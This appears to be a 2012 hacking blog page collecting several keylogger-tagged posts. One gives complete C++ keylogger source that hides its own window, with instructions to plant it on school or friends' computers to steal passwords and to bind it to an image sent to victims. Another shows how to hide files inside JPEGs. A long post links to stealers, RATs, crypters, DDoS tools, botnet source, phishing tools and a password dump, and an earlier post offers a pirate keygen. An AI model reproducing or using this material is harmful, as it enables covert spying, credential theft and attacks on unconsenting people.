Showing posts with label keyloggers. Show all posts
Showing posts with label keyloggers. Show all posts

Friday, 18 May 2012

Zemana Anti-logger with KeyGen | Stay Protected From Keyloggers.


Zemana Anti-logger with KeyGen | Stay Protected From Keyloggers...


Hello again everybody,Today i like to give an excellent anti-logger software called Zemana Anti-logger,  this is not an antivirus, but it could collaborate with such a software solution to deliver the most advanced defense for your system. It’s able to detect keyloggers, screen loggers, webcam loggers and clipboard loggers without slowing down Windows and, more importantly, without breaking the other security tools that might be running on your machine.

Protection Highlights

No need to download latest signatures: Unlike old-fashioned antivirus and anti-spyware products, AntiLogger does not wait to receive malware signatures in order to prevent malware attacks. You never have to worry about getting the latest update.

Compatible with commonly used security software: Signature-based anti-malware, personal firewall, disk encryption, and many other client security tools can continue to operate normally with AntiLogger.

Proactive Modules: Monitors installation, registry and file changes, spotting and stopping all suspicious behavior.

Bulletproof self-defense: AntiLogger cannot be deactivated by targeted attacks, ensuring continuity of protection.

How do I Get it?

• First of all download my KeyGen From HERE (wait 5 seconds and skip the ad.)

• Now Click on Generate and copy the code and close the KeyGen.


• Now,Download 15 day trial of Zemana Antilogger from HERE and install it.

• Finally,Register with the serial code that previously copied under services tab as shown in the below image.

Friday, 11 May 2012

create your own keylogger in minutes


     Hi guys, today I am going to talk about creating a keylogger for free using C++.I am going to introduce to the C++ Spyware code. It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page. 
Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting.  But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
  • Dev C++.
  • Download it from here: http://www.bloodshed.net/
  • Knowledge about Visual C++ (need, if you are going to develop the code).
Steps:
  • Install dev C++ in your system and open the dev C++ compiler.
  • Go to File->New->Source File.
  • You can see a blank works space will be there in window.
  • Now copy the below keylogger code into the blank work space.
#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}


  • Compile the Code(Ctrl+F9)





  • Now execute the program by selecting Execute->Run (ctrl+F10)
  • Now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
  • You can see the log.txt file where you save the file.





  • Bind the exe file with image or any files and send it to your friend.
                                                         (0R)
  • If you have physical access to your college/school system,then copy the exe file in that system and run it. 

That's it you are done.....

For now this is it futher i will be posting a new and more efficient keylogger. So stay updated through email!

Friday, 6 April 2012

Find out and Remove Keylogger Trojan from your pc


Are you beware that is there any Trojon or virus or any type of keylogger hidden working on your pc and sending your logins to hackers..  ??

Now no worry , here we have the ultimate solution of Hidden processses...Process Revealer  !
While your computer is ON, there are number of processes and applications running the background. We have already seen free utility process explorer to view such processes. Here is another free utility Process Revealer, which besides active processes also show hidden processes.
Hidden processes are not shown in Window’s standard Taskmanager. Using this utility, you can easily view and kill any hidden process that could be acting malicious on the computer.

As seen in image above, hidden processes are highlighted and can be easily identified in the list of active process. Kill or delete the source file off the trojons and make your pc happy n secure once again ...

Post Your Comments Below :-)

Monday, 2 April 2012

bind file in image / exe to jpeg

Exe to jpeg



1. Gather the file you wish to bind, and the image file, and place them in a folder. For the sake of this demonstration,I will be using C:\New Folder
*The image will hereby be referred to in all examples as tricks.jpg
*The file will hereby be referred to in all examples as New Text Document.txt


2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)


3. Open command prompt by going to Start > Run > cmd


4. In Command Prompt, navigate to the folder where your two files are by typingcd location [ex: cd C:\New Folder]
5. Type [copy /b tricks.jpg + secret.rar tricks.jpg] (remove the brackets)Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.


In order to view/extract your file, there are two options that you can take


a) Change the file extension from tricks.jpg to tricks.rar, then open and your file is there.


b) Leave the file extension as is, right click, open with WinRar and your file is there..

Wednesday, 21 March 2012

Free Download : Hackers professional toolkit : collection of Hacking tools

Collection of best hacking tools / keyloggers / rats / email bomber / email spoofer / havij.
Free Download: Hackers professional toolkit : collection of best Hacking tools, Biggest Collection ~ Download as Soon as Possible because soe files will be delete frOm Hosting website 

hacklab.jpg (400×285) 

1 - PLAYSTATION EMULATOR -- You can play ps2 games on your pc with this utility,a very handy tool for gamers,its better than bleem in compatibility.

http://uploading.com/files/d29ba697/epsx...lator.rar/

2 - Windows Admin Password Reset (Small Linux disk) -- Its a small linux image which can resets the admin password.

http://uploading.com/files/14747c2e/Wind...nload.rar/

3 - RAPIDSHARE ACCOUNT CHECKER(New Mask Added) -- Title says it all.

http://uploading.com/files/51cd3m24/RS%2...ECKER.rar/

4 - SQL FUZZER WITH VIDEO TUTORIAL(Only 1.5mb) -- Powerfull tool for sql injection.

http://uploading.com/files/253aaa2a/SQL%...ORIAL.rar/

5 - Ca0s SQL Perl Inj3ct0r v1 -- Good SQL injection tools source code.

http://uploading.com/files/9me23443/Ca0s...%2Bv1.rar/

6 - Milw0rm_Search_Utility_v1.0 by skyweb07 -- Small utility which can search exploits for you.

http://uploading.com/files/bfaem73d/Milw...web07.zip/

7 - Vaqxine Keylogger -- A very good tool by reputed member,it might not be FUD now but its a good tool.

http://uploading.com/files/69df2e18/Vaqx...ublic.rar/

8 - Hackers Tool Box -- Many handy tools.

http://uploading.com/files/3fm492c2/Hack...%2Bv1.rar/

9 - Nathans Image Worm -- It replaces every image on victim's pc with your defined image

ttp://uploading.com/files/3fe18118/Nath...BWorm.rar/

10 - HTTP Recon 7.3 -- Use it know weather an exe is backdoored or not.Basically its for Fingerprinting and vulnerability analysis.

http://uploading.com/files/fmd19969/httprecon-7.3.zip/

11 - JKymmel's Crypter -- For crypting you viruses.

http://uploading.com/files/e4m6514m/...2Bv%2B1.2.rar/


12 - Icon changer -- Change the icon of any file

http://uploading.com/files/6ad6aff5/IconChanger.rar/


ANONIMITY TOOLS


13 - Proximitron -- It proxifies every program you use even the command prompt.

http://uploading.com/files/ma6bm24e/proxo.rar/


14 - RAT proxy -- A tool to proxify yourself.Full info. attached.

http://uploading.com/files/64125a83/rat%2Bproxy.rar/


15 - Multi Proxy --Changes Your proxy on just one click or every few seconds.
http://uploading.com/files/7d5m5c98/multi%2Bproxy.rar/


16 - Jasager_Firmware_1.0 -- Its a Wifi MitM Tool for faking Your Access Point,it has
lots of deadly features.
http://uploading.com/files/14bm1md3/jasa...0.tar.rar/


17 - Hide my windows installer -- Hides your running programs instantly

http://uploading.com/files/827m8b65/hide...aller.zip/


SECURITY TOOLS

18 - TrueCrypt Setup 6.2a -- It uses a powerfull encryption system used by
government and agencies to encrypt your data.

http://uploading.com/files/d292b4a1/True...B6.2a.rar/

19 - NortOn GoBack -- This tools has saved me lots of time from serious error,this is a must have tools,it can
restore your pc to exact date and time.Its 1000 times better than system restore.

http://uploading.com/files/c197mf2m/Nort...B2005.rar/


20 - Anti_keylogger_sheild_v3.0 -- Now you don't have to worry about keyloggers and stealers,very usefull to have.

http://uploading.com/files/b9daed94/Anti..._v3.0.rar/


21 - Process Explorer -- A utility for listing all the processes running.

http://uploading.com/files/a42dd34f/Pokm...lorer.rar/


REVERSE ENGINEERING TOOLS

22 - Resource Hacker -- A good tool for reverse engg.

http://uploading.com/files/e3c829a6/ResHacker.rar/

23 - xvi32 -- A easy to use hexing tools.Very handy tool.

http://uploading.com/files/43c594a9/xvi32.rar/

24 - PE.Explorer for Reverse engg. -- More advanced tool for hexing.

http://uploading.com/files/461f31fe/PE.E...engg..zip/


DDOS TOOLS


25 - ProDoS v1.0 -- Powerfull tool to ddos websites.Just like site hog

http://uploading.com/files/b9fb62mf/ProDoS%2Bv1.0.zip/

26 - Ddos any site in this WWW -- Title says it all.

http://uploading.com/files/67cmb1f7/Ddos...2BWWW.rar/

27 - Site_Hog_v1 -- One of the most powerfull ddos tool.

http://uploading.com/files/e2e8f85e/Site...lease.rar/

28 - BFF DoS (Ping) v1.0 -- A good ddoser by BFF Productions


http://uploading.com/files/3838478a/BFF%...Bv1.0.rar/

29 - zDoS -- Again a powerfull ddoser.

http://uploading.com/files/4f9fd9ed/zDoS.rar/

30 - Secret Downloader -- Makes your victim download a trojan and run it hidden.

http://uploading.com/files/44b5eeb8/Tiny...r_V31.rar/

NEWLY ADDED TOOLS

31 - MD5 CRACKER BY XDEMO -- A good md5 Cracker.

http://uploading.com/files/a2e6848f/MD5CRACK.rar/

32 - PHISH GRABBER -- This tool will try to brute directories and files for the password log.In short it will hijack someone elses phishing log and their "hard work".
OCX and premade work list is included

http://uploading.com/files/c723368b/PHIS...ABBER.rar/

33 - MASSIVE XXX PASSWORDS DUMP -- TITLE SAYS IT ALL

http://uploading.com/files/b422251c/MASS...BDUMP.rar/

35 - KeyScrambler -- It encrypts all the keys you presses on the keyboard thereby protecting you from keyloggers,its a very usefull tool and it works great for me.

http://uploading.com/files/311a5f23/KeyS...Setup.rar/

36 - FUD GMAIL HACKER -- Awesome tool to hack gmail passwords,just needed little social engg.It makes victim feel that he/she is hacking a gmail id.

http://uploading.com/files/e2a839ee/Gmail_Hacker.rar/


37 - VNC CLIENT FOR YOUR MOBILE -- A VNC Client for J2ME (Java 2 Mobile Edition)

http://uploading.com/files/8816af8f/VNC-...40519.rar/


★ ULTIMATE TOOLS PACK [ PART -2 ] ★


38 - Hacker's Browser v2.0 by Alpha*** -- 

http://img20.imageshack.us/img20/5996/screenshotouy.jpg
- Built in milw0rm search
- Built in who.is
- Built in Reverse ip
and more features.

http://uploading.com/files/4a1m7f8a/Hack...ha***.rar/

39 - Private ddos tool by pureedee v3.0 -- One of the most powerfull ddos tool.Send 50,000 syn packets in a sec.
http://uploading.com/files/47222f78/Priv...Bv3.0.rar/

40- FUD CRYPTER - TITLE SAYS IT ALL. 
http://uploading.com/files/12144f18/FudC...p2009.rar/


41 - HACKER'S ASSISTANT [NOT FUD]
http://uploading.com/files/13f9mb48/Hack...stant.rar/



42 - CREDIT CARD PAYMENT [SECURE AND CLEAN] -- You can directly pay to anyone with help of this tool. 
http://uploading.com/files/mb5839d7/Cred...52529.rar/

43- SMS BOMBER [CLEAN] -- One of the best sms bomber i have seen,it supports tons of carriers,

http://uploading.com/files/87888a86/my-sms.rar/


44 - SERVER ATTACK TOOL [SOURCE CODE] 
-- SOURCE CODE OF A POWERFULL DDOS TOOL.
http://uploading.com/files/92e1cfbf/serv...ource.rar/


45 - TAKE DOWN SMALL WEBSITES [CLEAN] -- IT CAN TAKE DOWN SMALL WEBSITES DOWN IN SECONDS.
http://uploading.com/files/3am5m17e/take...sites.rar/

46 - ROOT MULTI ACCOUNTS CHECKER -- Its the best account checker out there,can check the accounts of about 22 sites including paypal,rapidshare etc.

http://uploading.com/files/e5fmbce9/Root...ecker.rar/

47 - EXPLOIT FOR GRABING USER AND PASS OF CPANEL + ITS HIGH QUALITY VIDEO TUTORIAL 
-- TITLE SAYS IT ALL.
http://uploading.com/files/7f14884m/grab...panel.rar/


48 - Email hacking SOftware by Ny.xXBRONX -- Very good tool which Makes victim think that he is hacking and email id and grabs his/her password and sends it to you.
http://uploading.com/files/f745cbc2/Emai...BRONX.rar/


49 - GhonZilla stealer -- Steales keys and other things
http://uploading.com/files/d18f8378/Ghon...ealer.rar/


50 - FACEBOOK FOREVER ACCOUNT FREEZER -- TITLE SAYS IT ALL.
http://uploading.com/files/7dm34b2a/face...eever.rar/


51 - Albertino_KeyLogger_Creator [CLEAN] -- Its one of the most wanted keylogger.
http://uploading.com/files/2999m21d/Albe...eator.rar/


52 - Cigi Cigi VIP RAT -- It might be detectable but has lots of features and is not common.
http://uploading.com/files/5ea9d176/Cigi...2BRAT.rar/


53 - AUTO POSTER [CLEAN] -- THIS IS A MUST HAVE TOOL,IT CAN INCREASE YOURDOWNLOADS INCREASE YOUR EARNINGS DRASTICALLY.IT AUTOMATICALLY POSTS YOUR DOWNLOAD LINK TO TONS OF FORUMS,ITS A BEST TOOL FOR UPLOADERS.
http://uploading.com/files/76ed84a6/auto%2Bposter.rar/


54 -Detect it easy --It can detect weather a file is binded or not,i have not scanned it,so scan it before use,it should be clean.
http://uploading.com/files/2e4e8be4/Dete...Beasy.rar/


55 - HACKING A SITE WITH SQL INJECTION AND UPLOADING A SHELL IN JOOMLA ADMIN PANEL [COMPRESSED]
 -- A GOOD AND INFORMATIVE TUT,SHOULD GIVE IT A LOOK,67.9 mb compressed to 1.3 mb only.
http://uploading.com/files/883f74d5/adva...oomla.rar/


56 - INTERNET LOCK -- If you ever feels any suspicious internet activity it can be blocked with just one click thereby protecting you from stealing of your information.
http://uploading.com/files/9m92e339/inte...Block.rar/


57 - b3y0nd mail bomber -- For bombing with tons of mails.
http://uploading.com/files/1m33f1m5/b3y0...omber.rar/


58 - SIGNATURE MAKER -- A VERY HANDY TOOL TO MAKE YOUR SIGNATURE FAST AND EASILY.
LINK REMOVED,I WILL POST IT AS SOON AS I'LL FIND A GOOD ONE.

59 - HH STEALER [CLEAN] -- Good stealer to steal passwords.Scan is attached.
http://uploading.com/files/e743e9bd/HH%2BSTEALER.rar/


60 - Multi Account Checker - A good account checker which can check weather an account is working or dead.
http://uploading.com/files/86a3cb2c/Mult...Bv1.0.rar/


61 - ADMIN PAGE FINDER [CLEAN] -- SMALL AND FAST TOOL WHICH CAN FIND THE ADMIN LOGIN OF ANY SITE.
http://uploading.com/files/bf986d1c/Admi...inder.rar/


★ ULTIMATE TOOLS PACK [ PART -3 ] ★
62- Yahoo! Messenger Fake 3.2 -- STEALS CHATS AND PASSWORDS AND SENDS IT TO YOU,IT LOOKS EXACTLY LIKE YAHOO MESSENGER.

http://uploading.com/files/a12ebeb2/Yaho...2B3.2.rar/


FORENSIC TOOLS


63-USB HISTORY -- TELL ALL THE FILES WHICH WERE KEPT IN THE USB STICK,A VERY GOOD AND IMPRESSIVE TOOL.

http://uploading.com/files/288e32cb/usb-...%2Br1.rar/


64-ADS LOCATOR -- Alternate Data Streams,AGAIN A VERY GOOD FORENSIC TOOL.
Its a tool that can be used to find files that have alternate ADS streams attached

http://uploading.com/files/ab171935/ads%...B2004.rar/


65-DISK INVESTIGATOR -- File-Slack-AnalyzeR,USED BY MANY FORENSIC COMPANIES TOO.

http://uploading.com/files/6bec2f6a/disk...gator.rar/


66-WINDOWS FILE ANALYSER -- ANALYSES ANY FILE FOR HIDDEN DATA IN IT.

http://uploading.com/files/mm4ed2ba/wind...2B1.0.rar/


67-NETWORK MINER -- I THINK EVERYONE MUST BE KNOWING ABOUT IT.

http://uploading.com/files/51615a66/Netw...B0.87.rar/


68-SYSTEM REPORT 3.5 -- ANALYSES AND GIVE A DETAILED REPORT OF ANY SYSTEM UNDER INVESTIGATION.

http://uploading.com/files/85fd1d2m/syst...2B2.5.rar/


MISC. TOOLS


69-(Competition) IRCbot -- TITLE SAYS IT ALL

http://uploading.com/files/e65cf1f4/%252...RCbot.rar/


70-ADMIN LOGIN FINDER SOURCE -- TITLE SAYS IT ALL.

http://uploading.com/files/3629a6a2/ADMI...OURCE.rar/


71 -EMAIL EXTRACTOR SOURCE -- EXTRACTS EMAILS FOR WEBSITES.

http://uploading.com/files/a1b2d3cd/Emai...ource.rar/


72-TWENTY MILLION EMAIL LIST + MASS EMAIL BOMBER -- MUST HAVE FOR ANY SPAMMER.

http://uploading.com/files/m5169de8/20.0...llist.rar/


73-ZIXT'S Botnet Source -- A GOOD BOTNET

http://uploading.com/files/f669adb5/Zixt...ource.rar/


74-PHP SPY BOT SCRIPT -- USE IT TO KNOW WHAT IT IS

http://uploading.com/files/6mem42bd/php%...cript.rar/


75-SAFE0VER SHELL - SAFE MODE BYPASS BY EVILCODER -- TITLE SAYS IT ALL

http://uploading.com/files/de9df5ab/Safe...c0der.rar/

76-REERAR -- A VERY HANDY TOOL FOR CRACKING RAR PASSWORDS.

http://uploading.com/files/e9d7b9e6/ReeRar.rar/


77 -Mayoko.v1.1.5 Incl Keymaker -- SEARCH RAPIDSHARE DATABASE,A VERY HANDY TOOL.

http://uploading.com/files/7f733d6f/Mayo...maker.rar/


78-MEDIAVLE bluescan_setup -- BLUETOOTH ATTACKER,CAN DO BLUE-BUG AND BLUE-SNARFING ATTACKS TOO.

http://uploading.com/files/986c711f/bluescan_setup.rar/


79- HISTORIAN -- TELLS ALL THE DELETED HISTORY OF ANY SYSTEM.

http://uploading.com/files/af56bb2b/hist...2B1.4.rar/


80-HYDRO PUMP -- A VERY GOOD AND IMPRESSIVE TOOL FOR ADDING BYTES TO ANY KIND OF FILE.

http://uploading.com/files/bf87e7dm/HydroPUMP_.rar/

81-BEAVERS PIC HUNTER -- SEARCHES FOR ALL THE PICS ON THE VICTIM'S PC AND UPLOAD IT TO YOUR FTP .

http://uploading.com/files/b57878e4/Beav...unter.rar/

82-SYS FLOOD -- A VERY POEWRFULL TOOL FOR DDOSING.

http://uploading.com/files/f46c49m1/SYN-flood.rar/ 



Dont Forget to Leave a Comment =)

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Hack The Ass | Follow Us On Twitter | Facebook Hacker | How To Install Andorid 2.3 on Computer | BEST WEBHOSTING WEBSITES FOR FREE / FREE HOSTING